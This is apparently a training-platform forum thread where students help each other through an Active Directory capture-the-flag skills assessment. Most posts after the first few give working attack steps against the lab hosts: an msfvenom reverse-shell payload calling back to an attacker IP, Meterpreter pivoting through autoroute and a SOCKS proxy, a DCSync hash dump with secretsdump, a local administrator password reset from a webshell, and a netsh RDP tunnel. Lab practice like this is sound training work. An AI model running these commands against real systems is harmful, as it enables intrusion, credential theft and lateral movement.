Active Directory - Skills Assessment I

This is also a good reference to the above mentione subject matter.

1 Like

Hi,
I got pretty stuck with the last flag.
I managed to perform the DCSync but can’t authenticate with the Domain Admins hashes. While using Rubeus to get a TGT I receive the following Error message:

KRB-ERROR (23) : KDC_ERR_KEY_EXPIRED

It seems the password and therefor the kerberos key/hash are expired. Is this intended?
Did I overlook another user with logon access to the DC?

Thanks in advance.

Well Ive tried to use metasploit now a few times to no avail. sessions dont stay open.

I tried to do it through the Antak webshell, i also used nc to get a stable shell first and then try to to open a second shell to mesfconsole using the exploit/multi/handler with the intenet to use the post shell_to _meterpreter to upgrade it. Unfortunately that did not stay open long enough.

the only stable shell i was able to get was a nc to nc shell sending cmd.exe to the attack box.

so now im guessing i have to do manual port forwarding and use proxychsains?

thoughts anyone?

Was able to get the 3rd answer with Enter and Invoke using powershell. Now i will investigate Active Directory - Skills Assessment I - #34 by Rapunzel3000

to try and figure out the rest! was trying to get metrepreter but no such luck.

1 Like

How did you get Metrepter to work. I tried using the generic multi/handler from metasploit and then using nc shell via Antak web shell, and i tried geting a regular nc to nc shell first and then sending a second shell to meterpreter but i was not successfull.

I want to do this also because i too have failed to get the cleartext, powerbview, or anything else to work via powershell remote.

give me a nudge in the right direction please!

Metasplot works when using payload generic shell, when ever you try windows/shell/reverse_tcp it dosent work.

how did you do this?

Can someone give a nudge? Been at this from last night!

Hello,

For Meterpreter Autoroute I sticked to the commands shown in the Pivoting & Port Forwarding Module. Can you spot a difference? Maybe this is related to your payload configuration?
Also use your own Kali VM by any means. Pwnbox causes a lot of trouble with proxying.

msfvenom -p windows/shell/reverse_tcp LHOST=10.10.16.16 LPORT=8080 -f exe > shell.exe

172.16.6.50 -> MS01
172.16.6.100 -> Webwin01
172.16.6.3 -> DC

msf6 > use exploit/multi/handler

[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8080
msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp
msf6 exploit(multi/handler) > run


Invoke-Expression -Command "c:\shell.exe"

msf > use post/multi/manage/shell_to_meterpreter
msf post(shell_to_meterpreter) > show options
    ... show and set options ...
msf post(shell_to_meterpreter) > set SESSION session-id
set lhost 10.10.16.16
msf post(shell_to_meterpreter) > run

sessions -i 2

msf6 > use post/multi/manage/autoroute

msf6 post(multi/manage/autoroute) > set SESSION 2
SESSION => 1
msf6 post(multi/manage/autoroute) > set SUBNET 172.16.6.0
SUBNET => 172.16.5.0
msf6 post(multi/manage/autoroute) > run

msf6 > use auxiliary/server/socks_proxy

msf6 auxiliary(server/socks_proxy) > set SRVPORT 9050
SRVPORT => 9050
msf6 auxiliary(server/socks_proxy) > set SRVHOST 0.0.0.0
SRVHOST => 0.0.0.0
msf6 auxiliary(server/socks_proxy) > set version 4a
version => 4a
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.

sudo nano /etc/proxychains.conf
run autoroute -p

sudo proxychains nmap 172.16.6.50 -sT -Pn -n --top-ports=10

proxychains secretsdump.py -outputfile hashes -just-dc INLANEFREIGHT/tpetty@172.16.6.3
1 Like

idk who needs to read this but I was able to create a nice RDP tunnel to MS01 from my linux attack host using these simple steps which u can learn from the pivoting and tunneling module too. if you prefer a windows experience try these tricks.

First, from the webshell, set the registry key so we can log in

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0

dont know any creds on the box so let’s just change the local admin’s pass, from the webshell

net user administrator newpass

now, from the linux attack host, log into a very limited cmd shell on WEB-WIN01 to setup a tunnel, where WEB-WIN01 is also the 10.X.X.X ip address of the webshell

xfreerdp /v:<WEB-WIN01> /u:administrator /p:newpass /cert:ignore

in the new RDP cmd window, after using nslookup to discover MS01 is 172.16.6.50 , make a tunnel with the netsh command which links WEB01’s 10.X.X.X reachable address on port 1515 to MS01’s RDP port 3389, like this:

netsh interface portproxy add v4tov4 listenport=1515 listenaddress=<WEB-WIN01> connectport=3389 connectaddress=172.16.6.50

RDP into MS01 from our attack host through the tunnel we just made to MS01 on WEB-WIN01 port 1515:

xfreerdp /v:<WEB-WIN01>:1515 /u:svc_XXX /p:XXckX7 /cert:ignore

it’s just so nice to copy and paste powershell scripts or exes like mimikatz and psexec with the clipboard of my linux machine and into the RDP window of MS01. if you prefer a windows experience to conduct the attacks you can use these tricks to make it easier on yourself.

1 Like